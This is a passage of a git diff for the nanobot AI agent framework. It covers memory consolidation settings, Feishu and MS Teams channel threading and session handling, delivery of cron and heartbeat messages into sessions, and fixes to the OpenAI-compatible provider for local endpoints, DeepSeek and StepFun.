diff --git a/nanobot/agent/loop.py b/nanobot/agent/loop.py index 7f830a0aa..a25528365 100644 --- a/nanobot/agent/loop.py +++ b/nanobot/agent/loop.py @@ -191,6 +191,7 @@ class AgentLoop: channels_config: ChannelsConfig | None = None, timezone: str | None = None, session_ttl_minutes: int = 0, + consolidation_ratio: float = 0.5, hooks: list[AgentHook] | None = None, unified_session: bool = False, disabled_skills: list[str] | None = None, @@ -274,6 +275,7 @@ class AgentLoop: build_messages=self.context.build_messages, get_tool_definitions=self.tools.get_definitions, max_completion_tokens=provider.generation.max_tokens, + consolidation_ratio=consolidation_ratio, ) self.auto_compact = AutoCompact( sessions=self.sessions, diff --git a/nanobot/agent/memory.py b/nanobot/agent/memory.py index 16c01d31c..cc14ea744 100644 --- a/nanobot/agent/memory.py +++ b/nanobot/agent/memory.py @@ -435,6 +435,7 @@ class Consolidator: build_messages: Callable[..., list[dict[str, Any]]], get_tool_definitions: Callable[[], list[dict[str, Any]]], max_completion_tokens: int = 4096, + consolidation_ratio: float = 0.5, ): self.store = store self.provider = provider @@ -442,6 +443,7 @@ class Consolidator: self.sessions = sessions self.context_window_tokens = context_window_tokens self.max_completion_tokens = max_completion_tokens + self.consolidation_ratio = consolidation_ratio self._build_messages = build_messages self._get_tool_definitions = get_tool_definitions self._locks: weakref.WeakValueDictionary[str, asyncio.Lock] = ( @@ -568,7 +570,7 @@ class Consolidator: lock = self.get_lock(session.key) async with lock: budget = self._input_token_budget - target = budget // 2 + target = int(budget * self.consolidation_ratio) try: estimated, source = self.estimate_session_prompt_tokens( session, diff --git a/nanobot/agent/tools/message.py b/nanobot/agent/tools/message.py index ee78df467..ea7f91bc8 100644 --- a/nanobot/agent/tools/message.py +++ b/nanobot/agent/tools/message.py @@ -42,6 +42,10 @@ class MessageTool(Tool): default=default_message_id, ) self._sent_in_turn_var: ContextVar[bool] = ContextVar("message_sent_in_turn", default=False) + self._record_channel_delivery_var: ContextVar[bool] = ContextVar( + "message_record_channel_delivery", + default=False, + ) def set_context(self, channel: str, chat_id: str, message_id: str | None = None) -> None: """Set the current message context.""" @@ -57,6 +61,14 @@ class MessageTool(Tool): """Reset per-turn send tracking.""" self._sent_in_turn = False + def set_record_channel_delivery(self, active: bool): + """Mark tool-sent messages as proactive channel deliveries.""" + return self._record_channel_delivery_var.set(active) + + def reset_record_channel_delivery(self, token) -> None: + """Restore previous proactive delivery recording state.""" + self._record_channel_delivery_var.reset(token) + @property def _sent_in_turn(self) -> bool: return self._sent_in_turn_var.get() @@ -117,15 +129,19 @@ class MessageTool(Tool): if not self._send_callback: return "Error: Message sending not configured" + metadata = { + "message_id": message_id, + } if message_id else {} + if self._record_channel_delivery_var.get(): + metadata["_record_channel_delivery"] = True + msg = OutboundMessage( channel=channel, chat_id=chat_id, content=content, media=media or [], buttons=buttons or [], - metadata={ - "message_id": message_id, - } if message_id else {}, + metadata=metadata, ) try: diff --git a/nanobot/agent/tools/shell.py b/nanobot/agent/tools/shell.py index aa8ca67b1..9484c73f7 100644 --- 
a/nanobot/agent/tools/shell.py +++ b/nanobot/agent/tools/shell.py @@ -136,9 +136,10 @@ class ExecTool(Tool): if self.path_append: if _IS_WINDOWS: - env["PATH"] = env.get("PATH", "") + ";" + self.path_append + env["PATH"] = env.get("PATH", "") + os.pathsep + self.path_append else: - command = f'export PATH="$PATH:{self.path_append}"; {command}' + env["NANOBOT_PATH_APPEND"] = self.path_append + command = f'export PATH="$PATH{os.pathsep}$NANOBOT_PATH_APPEND"; {command}' try: process = await self._spawn(command, cwd, env) @@ -298,8 +299,8 @@ class ExecTool(Tool): continue media_path = get_media_dir().resolve() - if (p.is_absolute() - and cwd_path not in p.parents + if (p.is_absolute() + and cwd_path not in p.parents and p != cwd_path and media_path not in p.parents and p != media_path diff --git a/nanobot/channels/feishu.py b/nanobot/channels/feishu.py index 41e937801..57260e906 100644 --- a/nanobot/channels/feishu.py +++ b/nanobot/channels/feishu.py @@ -13,6 +13,7 @@ from dataclasses import dataclass from typing import Any, Literal from lark_oapi.api.im.v1.model import MentionEvent, P2ImMessageReceiveV1 +from lark_oapi.core.const import FEISHU_DOMAIN, LARK_DOMAIN from loguru import logger from pydantic import Field @@ -22,8 +23,6 @@ from nanobot.channels.base import BaseChannel from nanobot.config.paths import get_media_dir from nanobot.config.schema import Base -from lark_oapi.core.const import FEISHU_DOMAIN, LARK_DOMAIN - FEISHU_AVAILABLE = importlib.util.find_spec("lark_oapi") is not None # Message type display mapping @@ -308,6 +307,8 @@ class FeishuChannel(BaseChannel): self._loop: asyncio.AbstractEventLoop | None = None self._stream_bufs: dict[str, _FeishuStreamBuf] = {} self._bot_open_id: str | None = None + self._background_tasks: set[asyncio.Task] = set() + self._reaction_ids: dict[str, str] = {} # message_id → reaction_id @staticmethod def _register_optional_event(builder: Any, method_name: str, handler: Any) -> Any: @@ -549,8 +550,11 @@ class FeishuChannel(BaseChannel): return None async def _add_reaction(self, message_id: str, emoji_type: str = "THUMBSUP") -> str | None: - """ - Add a reaction emoji to a message (non-blocking). + """Add a reaction emoji to a message. + + Returns the reaction_id on success, None on failure. + When called via a tracked background task, the returned reaction_id + is stored in ``_reaction_ids`` for later cleanup by ``send_delta``. 
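+
+        Typical lifecycle (as wired in ``_on_message`` in this change): the
+        handler schedules this coroutine as a tracked background task,
+        ``_on_reaction_added`` records the returned id in ``_reaction_ids``,
+        and ``send_delta`` pops and removes it on stream end.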
Common emoji types: THUMBSUP, OK, EYES, DONE, OnIt, HEART """ @@ -594,6 +598,36 @@ class FeishuChannel(BaseChannel): loop = asyncio.get_running_loop() await loop.run_in_executor(None, self._remove_reaction_sync, message_id, reaction_id) + def _on_background_task_done(self, task: asyncio.Task) -> None: + """Callback: remove from tracking set and log unhandled exceptions.""" + self._background_tasks.discard(task) + if task.cancelled(): + return + try: + task.result() + except Exception as exc: + logger.warning("Background task failed: {}", exc) + + def _on_reaction_added(self, message_id: str, task: asyncio.Task) -> None: + """Callback: store reaction_id after background add-reaction completes.""" + if task.cancelled(): + return + try: + reaction_id = task.result() + if reaction_id: + self._reaction_ids[message_id] = reaction_id + except Exception: + pass # already logged by _on_background_task_done + # Trim cache to prevent unbounded growth + if len(self._reaction_ids) > 500: + self._reaction_ids.pop(next(iter(self._reaction_ids))) + + @staticmethod + def _stream_key(chat_id: str, metadata: dict[str, Any] | None = None) -> str: + """Scope streaming buffers to the inbound message when available.""" + meta = metadata or {} + return meta.get("message_id") or chat_id + # Regex to match markdown tables (header + separator + data rows) _TABLE_RE = re.compile( r"((?:^[ \t]*\|.+\|[ \t]*\n)(?:^[ \t]*\|[-:\s|]+\|[ \t]*\n)(?:^[ \t]*\|.+\|[ \t]*\n?)+)", @@ -1101,17 +1135,23 @@ class FeishuChannel(BaseChannel): logger.debug("Feishu: error fetching parent message {}: {}", message_id, e) return None - def _reply_message_sync(self, parent_message_id: str, msg_type: str, content: str) -> bool: - """Reply to an existing Feishu message using the Reply API (synchronous).""" + def _reply_message_sync(self, parent_message_id: str, msg_type: str, content: str, *, reply_in_thread: bool = False) -> bool: + """Reply to an existing Feishu message using the Reply API (synchronous). + + Args: + reply_in_thread: If True, reply as a thread/topic message + in the Feishu client. + """ from lark_oapi.api.im.v1 import ReplyMessageRequest, ReplyMessageRequestBody try: + body_builder = ReplyMessageRequestBody.builder().msg_type(msg_type).content(content) + if reply_in_thread: + body_builder = body_builder.reply_in_thread(True) request = ( ReplyMessageRequest.builder() .message_id(parent_message_id) - .request_body( - ReplyMessageRequestBody.builder().msg_type(msg_type).content(content).build() - ) + .request_body(body_builder.build()) .build() ) response = self._client.im.v1.message.reply(request) @@ -1166,8 +1206,19 @@ class FeishuChannel(BaseChannel): logger.error("Error sending Feishu {} message: {}", msg_type, e) return None - def _create_streaming_card_sync(self, receive_id_type: str, chat_id: str) -> str | None: - """Create a CardKit streaming card, send it to chat, return card_id.""" + def _create_streaming_card_sync( + self, + receive_id_type: str, + chat_id: str, + reply_message_id: str | None = None, + ) -> str | None: + """Create a CardKit streaming card, send it to chat, return card_id. + + When *reply_message_id* is provided the card is delivered via the + reply API (with reply_in_thread=True) so it lands inside the + originating thread / topic. Otherwise the plain create-message + API is used. 
+ """ from lark_oapi.api.cardkit.v1 import CreateCardRequest, CreateCardRequestBody card_json = { @@ -1196,13 +1247,19 @@ class FeishuChannel(BaseChannel): return None card_id = getattr(response.data, "card_id", None) if card_id: - message_id = self._send_message_sync( - receive_id_type, - chat_id, - "interactive", - json.dumps({"type": "card", "data": {"card_id": card_id}}), + card_content = json.dumps( + {"type": "card", "data": {"card_id": card_id}}, ensure_ascii=False ) - if message_id: + if reply_message_id: + sent = self._reply_message_sync( + reply_message_id, "interactive", card_content, + reply_in_thread=True, + ) + else: + sent = self._send_message_sync( + receive_id_type, chat_id, "interactive", card_content, + ) is not None + if sent: return card_id logger.warning( "Created streaming card {} but failed to send it to {}", card_id, chat_id @@ -1292,23 +1349,27 @@ class FeishuChannel(BaseChannel): _stream_end: Finalize the streaming card. _tool_hint: Delta is a formatted tool hint (for display only). message_id: Original message id (used with _stream_end for reaction cleanup). - reaction_id: Reaction id to remove on stream end. + chat_type: "group" or "p2p" — controls reply-in-thread for streaming cards. """ if not self._client: return meta = metadata or {} + stream_key = self._stream_key(chat_id, meta) loop = asyncio.get_running_loop() rid_type = "chat_id" if chat_id.startswith("oc_") else "open_id" # --- stream end: final update or fallback --- if meta.get("_stream_end"): - if (message_id := meta.get("message_id")) and (reaction_id := meta.get("reaction_id")): - await self._remove_reaction(message_id, reaction_id) + message_id = meta.get("message_id") + if message_id: + reaction_id = self._reaction_ids.pop(message_id, None) + if reaction_id: + await self._remove_reaction(message_id, reaction_id) # Add completion emoji if configured - if self.config.done_emoji and message_id: + if self.config.done_emoji: await self._add_reaction(message_id, self.config.done_emoji) - buf = self._stream_bufs.pop(chat_id, None) + buf = self._stream_bufs.pop(stream_key, None) if not buf or not buf.text: return # Try to finalize via streaming card; if that fails (e.g. @@ -1343,24 +1404,45 @@ class FeishuChannel(BaseChannel): {"config": {"wide_screen_mode": True}, "elements": chunk}, ensure_ascii=False, ) - await loop.run_in_executor( - None, self._send_message_sync, rid_type, chat_id, "interactive", card - ) + # Fallback: reply via the Reply API for group chats. + # Target message_id — the Feishu API keeps the reply in + # the same topic automatically. + _f_msg = meta.get("message_id") + fallback_msg_id = _f_msg if meta.get("chat_type", "group") == "group" else None + if fallback_msg_id: + await loop.run_in_executor( + None, lambda: self._reply_message_sync( + fallback_msg_id, "interactive", card, + reply_in_thread=True, + ), + ) + else: + await loop.run_in_executor( + None, self._send_message_sync, rid_type, chat_id, "interactive", card + ) return # --- accumulate delta --- - buf = self._stream_bufs.get(chat_id) + buf = self._stream_bufs.get(stream_key) if buf is None: buf = _FeishuStreamBuf() - self._stream_bufs[chat_id] = buf + self._stream_bufs[stream_key] = buf buf.text += delta if not buf.text.strip(): return now = time.monotonic() if buf.card_id is None: + # Send the streaming card as a reply for group chats so it + # lands inside the originating topic/thread. Always target + # message_id (the actual inbound message) — the Feishu Reply + # API keeps the response in the same topic automatically. 
+ is_group = meta.get("chat_type", "group") == "group" + reply_msg_id = meta.get("message_id") if is_group else None card_id = await loop.run_in_executor( - None, self._create_streaming_card_sync, rid_type, chat_id + None, + self._create_streaming_card_sync, + rid_type, chat_id, reply_msg_id, ) if card_id: buf.card_id = card_id @@ -1393,7 +1475,7 @@ class FeishuChannel(BaseChannel): hint = (msg.content or "").strip() if not hint: return - buf = self._stream_bufs.get(msg.chat_id) + buf = self._stream_bufs.get(self._stream_key(msg.chat_id, msg.metadata)) if buf and buf.card_id: # Delegate to send_delta so tool hints get the same # throttling (and card creation) as regular text deltas. @@ -1404,37 +1486,59 @@ class FeishuChannel(BaseChannel): return # No active streaming card — send as a regular # interactive card with the same 🔧 prefix style. + # Use reply API for group chats so the hint stays in topic. card = json.dumps( {"config": {"wide_screen_mode": True}, "elements": [ {"tag": "markdown", "content": self._format_tool_hint_delta(hint)}, ]}, ensure_ascii=False, ) - await loop.run_in_executor( - None, self._send_message_sync, receive_id_type, msg.chat_id, "interactive", card - ) + _th_msg_id = msg.metadata.get("message_id") + _th_chat_type = msg.metadata.get("chat_type", "group") + if _th_msg_id and _th_chat_type == "group": + await loop.run_in_executor( + None, lambda: self._reply_message_sync( + _th_msg_id, "interactive", card, + reply_in_thread=True, + ), + ) + else: + await loop.run_in_executor( + None, self._send_message_sync, receive_id_type, msg.chat_id, "interactive", card + ) return # Determine whether the first message should quote the user's message. # Only the very first send (media or text) in this call uses reply; subsequent # chunks/media fall back to plain create to avoid redundant quote bubbles. + # Always target message_id — the Feishu Reply API keeps replies in the + # same topic automatically when the target message is inside a topic. reply_message_id: str | None = None + _msg_id = msg.metadata.get("message_id") if self.config.reply_to_message and not msg.metadata.get("_progress", False): - reply_message_id = msg.metadata.get("message_id") or None + reply_message_id = _msg_id # For topic group messages, always reply to keep context in thread elif msg.metadata.get("thread_id"): - reply_message_id = ( - msg.metadata.get("root_id") or msg.metadata.get("message_id") or None - ) + reply_message_id = _msg_id first_send = True # tracks whether the reply has already been used def _do_send(m_type: str, content: str) -> None: - """Send via reply (first message) or create (subsequent).""" + """Send via reply (first message) or create (subsequent). + + For group chats the reply API always uses reply_in_thread=True. + The Feishu API automatically keeps replies inside existing + topics — reply_in_thread only creates a *new* topic when the + target message is a plain (non-topic) message. 
+ """ nonlocal first_send if reply_message_id and first_send: first_send = False - ok = self._reply_message_sync(reply_message_id, m_type, content) + chat_type = msg.metadata.get("chat_type", "group") + ok = self._reply_message_sync( + reply_message_id, m_type, content, + reply_in_thread=chat_type == "group", + ) if ok: return # Fall back to regular send if reply fails @@ -1543,8 +1647,13 @@ class FeishuChannel(BaseChannel): logger.debug("Feishu: skipping group message (not mentioned)") return - # Add reaction - reaction_id = await self._add_reaction(message_id, self.config.react_emoji) + # Add reaction (non-blocking — tracked background task) + task = asyncio.create_task( + self._add_reaction(message_id, self.config.react_emoji) + ) + self._background_tasks.add(task) + task.add_done_callback(self._on_background_task_done) + task.add_done_callback(lambda t: self._on_reaction_added(message_id, t)) # Parse content content_parts = [] @@ -1624,6 +1733,15 @@ class FeishuChannel(BaseChannel): if not content and not media_paths: return + # Build topic-scoped session key for conversation isolation. + # Group chat: each topic gets its own session via root_id (replies + # inside a topic) or message_id (top-level messages start a new topic). + # Private chat: no override — same behavior as Telegram/Slack. + if chat_type == "group": + session_key = f"feishu:{chat_id}:{root_id or message_id}" + else: + session_key = None + # Forward to message bus reply_to = chat_id if chat_type == "group" else sender_id await self._handle_message( @@ -1633,13 +1751,13 @@ class FeishuChannel(BaseChannel): media=media_paths, metadata={ "message_id": message_id, - "reaction_id": reaction_id, "chat_type": chat_type, "msg_type": msg_type, "parent_id": parent_id, "root_id": root_id, "thread_id": thread_id, }, + session_key=session_key, ) except Exception as e: diff --git a/nanobot/channels/msteams.py b/nanobot/channels/msteams.py index 427b35f8c..f1c0ac1bc 100644 --- a/nanobot/channels/msteams.py +++ b/nanobot/channels/msteams.py @@ -70,6 +70,7 @@ class ConversationRef: activity_id: str | None = None conversation_type: str | None = None tenant_id: str | None = None + updated_at: float | None = None class MSTeamsChannel(BaseChannel): @@ -220,7 +221,6 @@ class MSTeamsChannel(BaseChannel): token = await self._get_access_token() base_url = f"{ref.service_url.rstrip('/')}/v3/conversations/{ref.conversation_id}/activities" use_thread_reply = self.config.reply_in_thread and bool(ref.activity_id) - url = f"{base_url}/{ref.activity_id}" if use_thread_reply else base_url headers = { "Authorization": f"Bearer {token}", "Content-Type": "application/json", @@ -233,7 +233,7 @@ class MSTeamsChannel(BaseChannel): payload["replyToId"] = ref.activity_id try: - resp = await self._http.post(url, headers=headers, json=payload) + resp = await self._http.post(base_url, headers=headers, json=payload) resp.raise_for_status() logger.info("MSTeams message sent to {}", ref.conversation_id) except Exception as e: @@ -289,7 +289,9 @@ class MSTeamsChannel(BaseChannel): activity_id=activity_id or None, conversation_type=conversation_type or None, tenant_id=str((channel_data.get("tenant") or {}).get("id") or "") or None, + updated_at=time.time(), ) + self._save_refs() await self._handle_message( @@ -310,10 +312,12 @@ class MSTeamsChannel(BaseChannel): """Extract the user-authored text from a Teams activity.""" text = str(activity.get("text") or "") text = self._strip_possible_bot_mention(text) + text = self._normalize_html_whitespace(text) channel_data = 
activity.get("channelData") or {} reply_to_id = str(activity.get("replyToId") or "").strip() normalized_preview = html.unescape(text).replace("&rsquo", "’").strip() + normalized_preview = normalized_preview.replace("\xa0", " ") normalized_preview = normalized_preview.replace("\r\n", "\n").replace("\r", "\n") preview_lines = [line.strip() for line in normalized_preview.split("\n")] while preview_lines and not preview_lines[0]: @@ -333,9 +337,15 @@ class MSTeamsChannel(BaseChannel): cleaned = re.sub(r"(?:\r?\n){3,}", "\n\n", cleaned) return cleaned.strip() + def _normalize_html_whitespace(self, text: str) -> str: + """Normalize common HTML whitespace/entities from Teams into plain text spacing.""" + normalized = html.unescape(text).replace("&rsquo", "’") + normalized = normalized.replace("\xa0", " ") + return normalized + def _normalize_teams_reply_quote(self, text: str) -> str: """Normalize Teams quoted replies into a compact structured form.""" - cleaned = html.unescape(text).replace("&rsquo", "’").strip() + cleaned = self._normalize_html_whitespace(text).strip() if not cleaned: return "" @@ -494,6 +504,14 @@ class MSTeamsChannel(BaseChannel): def _save_refs(self) -> None: """Persist conversation references.""" try: + stale_keys = [ + key + for key, ref in self._conversation_refs.items() + if self._is_stale_or_unsupported_ref(ref) + ] + for key in stale_keys: + self._conversation_refs.pop(key, None) + data = { key: { "service_url": ref.service_url, @@ -502,6 +520,7 @@ class MSTeamsChannel(BaseChannel): "activity_id": ref.activity_id, "conversation_type": ref.conversation_type, "tenant_id": ref.tenant_id, + "updated_at": ref.updated_at, } for key, ref in self._conversation_refs.items() } @@ -509,6 +528,21 @@ class MSTeamsChannel(BaseChannel): except Exception as e: logger.warning("Failed to save MSTeams conversation refs: {}", e) + def _is_stale_or_unsupported_ref(self, ref: ConversationRef) -> bool: + """Reject unsupported refs and prune old refs.""" + service_url = (ref.service_url or "").strip().lower() + conversation_type = (ref.conversation_type or "").strip().lower() + updated_at = ref.updated_at or 0.0 + max_age_seconds = 30 * 24 * 60 * 60 + + if "webchat.botframework.com" in service_url: + return True + if conversation_type and conversation_type != "personal": + return True + if updated_at and updated_at < time.time() - max_age_seconds: + return True + return False + async def _get_access_token(self) -> str: """Fetch an access token for Bot Framework / Azure Bot auth.""" diff --git a/nanobot/cli/commands.py b/nanobot/cli/commands.py index 088433055..22bb8b825 100644 --- a/nanobot/cli/commands.py +++ b/nanobot/cli/commands.py @@ -537,6 +537,7 @@ def serve( unified_session=runtime_config.agents.defaults.unified_session, disabled_skills=runtime_config.agents.defaults.disabled_skills, session_ttl_minutes=runtime_config.agents.defaults.session_ttl_minutes, + consolidation_ratio=runtime_config.agents.defaults.consolidation_ratio, tools_config=runtime_config.tools, ) @@ -597,6 +598,8 @@ def _run_gateway( """Shared gateway runtime; ``open_browser_url`` opens a tab once channels are up.""" from nanobot.agent.loop import AgentLoop from nanobot.agent.runtime import build_agent_runtime, load_agent_runtime + from nanobot.agent.tools.cron import CronTool + from nanobot.agent.tools.message import MessageTool from nanobot.bus.queue import MessageBus from nanobot.channels.manager import ChannelManager from nanobot.cron.service import CronService @@ -647,11 +650,52 @@ def _run_gateway( 
unified_session=config.agents.defaults.unified_session, disabled_skills=config.agents.defaults.disabled_skills, session_ttl_minutes=config.agents.defaults.session_ttl_minutes, + consolidation_ratio=config.agents.defaults.consolidation_ratio, tools_config=config.tools, runtime_loader=load_agent_runtime, runtime_signature=runtime.signature, ) + from nanobot.agent.loop import UNIFIED_SESSION_KEY + from nanobot.bus.events import OutboundMessage + + def _channel_session_key(channel: str, chat_id: str) -> str: + return ( + UNIFIED_SESSION_KEY + if config.agents.defaults.unified_session + else f"{channel}:{chat_id}" + ) + + async def _deliver_to_channel(msg: OutboundMessage, *, record: bool = False) -> None: + """Publish a user-visible message and mirror it into that channel's session.""" + metadata = dict(msg.metadata or {}) + record = record or bool(metadata.pop("_record_channel_delivery", False)) + if metadata != (msg.metadata or {}): + msg = OutboundMessage( + channel=msg.channel, + chat_id=msg.chat_id, + content=msg.content, + reply_to=msg.reply_to, + media=msg.media, + metadata=metadata, + buttons=msg.buttons, + ) + if ( + record + and msg.channel != "cli" + and msg.content.strip() + and hasattr(session_manager, "get_or_create") + and hasattr(session_manager, "save") + ): + session = session_manager.get_or_create(_channel_session_key(msg.channel, msg.chat_id)) + session.add_message("assistant", msg.content, _channel_delivery=True) + session_manager.save(session) + await bus.publish_outbound(msg) + + message_tool = getattr(agent, "tools", {}).get("message") + if isinstance(message_tool, MessageTool): + message_tool.set_send_callback(_deliver_to_channel) + # Set cron callback (needs agent) async def on_cron_job(job: CronJob) -> str | None: """Execute a cron job through the agent.""" @@ -664,8 +708,6 @@ def _run_gateway( logger.exception("Dream cron job failed") return None - from nanobot.agent.tools.cron import CronTool - from nanobot.agent.tools.message import MessageTool from nanobot.utils.evaluator import evaluate_response reminder_note = ( @@ -682,6 +724,10 @@ def _run_gateway( async def _silent(*_args, **_kwargs): pass + message_record_token = None + if isinstance(message_tool, MessageTool): + message_record_token = message_tool.set_record_channel_delivery(True) + try: resp = await agent.process_direct( reminder_note, @@ -693,10 +739,11 @@ def _run_gateway( finally: if isinstance(cron_tool, CronTool) and cron_token is not None: cron_tool.reset_cron_context(cron_token) + if isinstance(message_tool, MessageTool) and message_record_token is not None: + message_tool.reset_record_channel_delivery(message_record_token) response = resp.content if resp else "" - message_tool = agent.tools.get("message") if job.payload.deliver and isinstance(message_tool, MessageTool) and message_tool._sent_in_turn: return response @@ -705,12 +752,14 @@ def _run_gateway( response, reminder_note, provider, agent.model, ) if should_notify: - from nanobot.bus.events import OutboundMessage - await bus.publish_outbound(OutboundMessage( - channel=job.payload.channel or "cli", - chat_id=job.payload.to, - content=response, - )) + await _deliver_to_channel( + OutboundMessage( + channel=job.payload.channel or "cli", + chat_id=job.payload.to, + content=response, + ), + record=True, + ) return response cron.on_job = on_cron_job @@ -760,12 +809,22 @@ def _run_gateway( return resp.content if resp else "" async def on_heartbeat_notify(response: str) -> None: - """Deliver a heartbeat response to the user's channel.""" - from 
nanobot.bus.events import OutboundMessage + """Deliver a heartbeat response to the user's channel. + + In addition to publishing the outbound message, this injects the + delivered text as an assistant turn into the *target channel's* + session. Without this, a user reply on the channel (e.g. "Sure") + lands in a session that has no context about the heartbeat message + and the agent cannot follow through. + """ channel, chat_id = _pick_heartbeat_target() if channel == "cli": return # No external channel available to deliver to - await bus.publish_outbound(OutboundMessage(channel=channel, chat_id=chat_id, content=response)) + + await _deliver_to_channel( + OutboundMessage(channel=channel, chat_id=chat_id, content=response), + record=True, + ) hb_cfg = config.gateway.heartbeat heartbeat = HeartbeatService( @@ -968,6 +1027,7 @@ def agent( unified_session=config.agents.defaults.unified_session, disabled_skills=config.agents.defaults.disabled_skills, session_ttl_minutes=config.agents.defaults.session_ttl_minutes, + consolidation_ratio=config.agents.defaults.consolidation_ratio, tools_config=config.tools, ) restart_notice = consume_restart_notice_from_env() diff --git a/nanobot/config/schema.py b/nanobot/config/schema.py index cca8f210f..e1f91aeb0 100644 --- a/nanobot/config/schema.py +++ b/nanobot/config/schema.py @@ -90,6 +90,13 @@ class AgentDefaults(Base): validation_alias=AliasChoices("idleCompactAfterMinutes", "sessionTtlMinutes"), serialization_alias="idleCompactAfterMinutes", ) # Auto-compact idle threshold in minutes (0 = disabled) + consolidation_ratio: float = Field( + default=0.5, + ge=0.1, + le=0.95, + validation_alias=AliasChoices("consolidationRatio"), + serialization_alias="consolidationRatio", + ) # Consolidation target ratio (0.5 = 50% of budget retained after compression) dream: DreamConfig = Field(default_factory=DreamConfig) diff --git a/nanobot/nanobot.py b/nanobot/nanobot.py index 374f93541..4cd4a6a7f 100644 --- a/nanobot/nanobot.py +++ b/nanobot/nanobot.py @@ -84,6 +84,7 @@ class Nanobot: unified_session=defaults.unified_session, disabled_skills=defaults.disabled_skills, session_ttl_minutes=defaults.session_ttl_minutes, + consolidation_ratio=defaults.consolidation_ratio, tools_config=config.tools, ) return cls(loop) diff --git a/nanobot/providers/openai_compat_provider.py b/nanobot/providers/openai_compat_provider.py index f603b9e37..fdbad585c 100644 --- a/nanobot/providers/openai_compat_provider.py +++ b/nanobot/providers/openai_compat_provider.py @@ -3,17 +3,20 @@ from __future__ import annotations import asyncio -import json import hashlib import importlib.util +import json import os import secrets import string import time import uuid from collections.abc import Awaitable, Callable +from ipaddress import ip_address from typing import TYPE_CHECKING, Any +from urllib.parse import urlparse +import httpx import json_repair from loguru import logger @@ -159,6 +162,37 @@ _RESPONSES_FAILURE_THRESHOLD = 3 _RESPONSES_PROBE_INTERVAL_S = 300 # 5 minutes +def _is_local_endpoint( + spec: "ProviderSpec | None", + api_base: str | None, +) -> bool: + """Return True when the endpoint is a local or LAN model server. + + Matches either the provider spec's ``is_local`` flag or common private- + network patterns in the base URL (localhost, 127.x, 192.168.x, 10.x, + 172.16-31.x, Docker ``host.docker.internal``). 
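+
+    Illustrative (mirrors cases covered by the new tests in this change)::
+
+        _is_local_endpoint(None, "http://192.168.8.188:1234/v1")          # True
+        _is_local_endpoint(None, "http://host.docker.internal:11434/v1")  # True
+        _is_local_endpoint(None, "https://api.openai.com/v1")             # False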
+ """ + if spec and spec.is_local: + return True + if not api_base: + return False + raw = api_base.strip().lower() + parsed = urlparse(raw if "://" in raw else f"//{raw}") + try: + host = parsed.hostname + except ValueError: + return False + if host in {"localhost", "host.docker.internal"}: + return True + if not host: + return False + try: + addr = ip_address(host) + except ValueError: + return False + return addr.is_loopback or addr.is_private + + def _is_direct_openai_base(api_base: str | None) -> bool: """Return True for direct OpenAI endpoints, not generic OpenAI-compatible gateways.""" if not api_base: @@ -208,11 +242,27 @@ class OpenAICompatProvider(LLMProvider): if extra_headers: default_headers.update(extra_headers) + # Local model servers (Ollama, llama.cpp, vLLM) often close idle + # HTTP connections before the client-side keepalive expires. When + # two LLM calls happen seconds apart (e.g. heartbeat _decide then + # process_direct), the second call may grab a now-dead pooled + # connection, causing a transient APIConnectionError on every first + # attempt. Disabling keepalive for local endpoints avoids this by + # opening a fresh connection for each request, which is cheap on a + # LAN. Cloud providers benefit from keepalive, so we leave the + # default pool settings for them. + http_client: httpx.AsyncClient | None = None + if _is_local_endpoint(spec, effective_base): + http_client = httpx.AsyncClient( + limits=httpx.Limits(keepalive_expiry=0), + ) + self._client = AsyncOpenAI( api_key=api_key or "no-key", base_url=effective_base, default_headers=default_headers, max_retries=0, + http_client=http_client, ) # Responses API circuit breaker: skip after repeated failures, @@ -334,6 +384,47 @@ class OpenAICompatProvider(LLMProvider): clean["tool_call_id"] = map_id(clean["tool_call_id"]) return self._enforce_role_alternation(sanitized) + def _drop_deepseek_incomplete_reasoning_history( + self, + messages: list[dict[str, Any]], + reasoning_effort: str | None, + ) -> list[dict[str, Any]]: + if ( + not self._spec + or self._spec.name != "deepseek" + or not reasoning_effort + or reasoning_effort.lower() == "none" + ): + return messages + + bad_idx = None + for idx, msg in enumerate(messages): + if ( + msg.get("role") == "assistant" + and msg.get("tool_calls") + and not msg.get("reasoning_content") + ): + bad_idx = idx + if bad_idx is None: + return messages + + keep_from = None + for idx in range(bad_idx + 1, len(messages)): + if messages[idx].get("role") == "user": + keep_from = idx + break + + if keep_from is None: + trimmed = messages[:bad_idx] + else: + prefix = [msg for msg in messages[:keep_from] if msg.get("role") == "system"] + trimmed = prefix + messages[keep_from:] + logger.warning( + "Dropped {} DeepSeek thinking history message(s) with incomplete reasoning_content", + len(messages) - len(trimmed), + ) + return trimmed + # ------------------------------------------------------------------ # Build kwargs # ------------------------------------------------------------------ @@ -374,6 +465,10 @@ class OpenAICompatProvider(LLMProvider): if spec and spec.strip_model_prefix: model_name = model_name.split("/")[-1] + messages = self._drop_deepseek_incomplete_reasoning_history( + messages, + reasoning_effort, + ) kwargs: dict[str, Any] = { "model": model_name, "messages": self._sanitize_messages(self._sanitize_empty_content(messages)), @@ -709,8 +804,8 @@ class OpenAICompatProvider(LLMProvider): finish_reason = str(choice0.get("finish_reason") or "stop") raw_tool_calls: list[Any] = [] 
- # StepFun Plan: fallback to reasoning field when content is empty - if not content and msg0.get("reasoning"): + # StepFun: fallback to reasoning field when content is empty + if not content and msg0.get("reasoning") and self._spec and self._spec.reasoning_as_content: content = self._extract_text_content(msg0.get("reasoning")) reasoning_content = msg0.get("reasoning_content") if not reasoning_content and msg0.get("reasoning"): @@ -770,7 +865,7 @@ class OpenAICompatProvider(LLMProvider): finish_reason = ch.finish_reason if not content and m.content: content = m.content - if not content and getattr(m, "reasoning", None): + if not content and getattr(m, "reasoning", None) and self._spec and self._spec.reasoning_as_content: content = m.reasoning tool_calls = [] diff --git a/nanobot/providers/registry.py b/nanobot/providers/registry.py index 5037e3003..6cb57cb04 100644 --- a/nanobot/providers/registry.py +++ b/nanobot/providers/registry.py @@ -71,6 +71,11 @@ class ProviderSpec: # "reasoning_split" — {"reasoning_split": true/false} (MiniMax) thinking_style: str = "" + # When True, treat the "reasoning" response field as formal content + # when "content" is empty. Only set this for providers (e.g. StepFun) + # whose API returns the actual answer in "reasoning" instead of "content". + reasoning_as_content: bool = False + @property def label(self) -> str: return self.display_name or self.name.title() @@ -325,6 +330,7 @@ PROVIDERS: tuple[ProviderSpec, ...] = ( display_name="Step Fun", backend="openai_compat", default_api_base="https://api.stepfun.com/v1", + reasoning_as_content=True, ), # Xiaomi MIMO (小米): OpenAI-compatible API ProviderSpec( diff --git a/nanobot/session/manager.py b/nanobot/session/manager.py index 69509a839..ddcfdea14 100644 --- a/nanobot/session/manager.py +++ 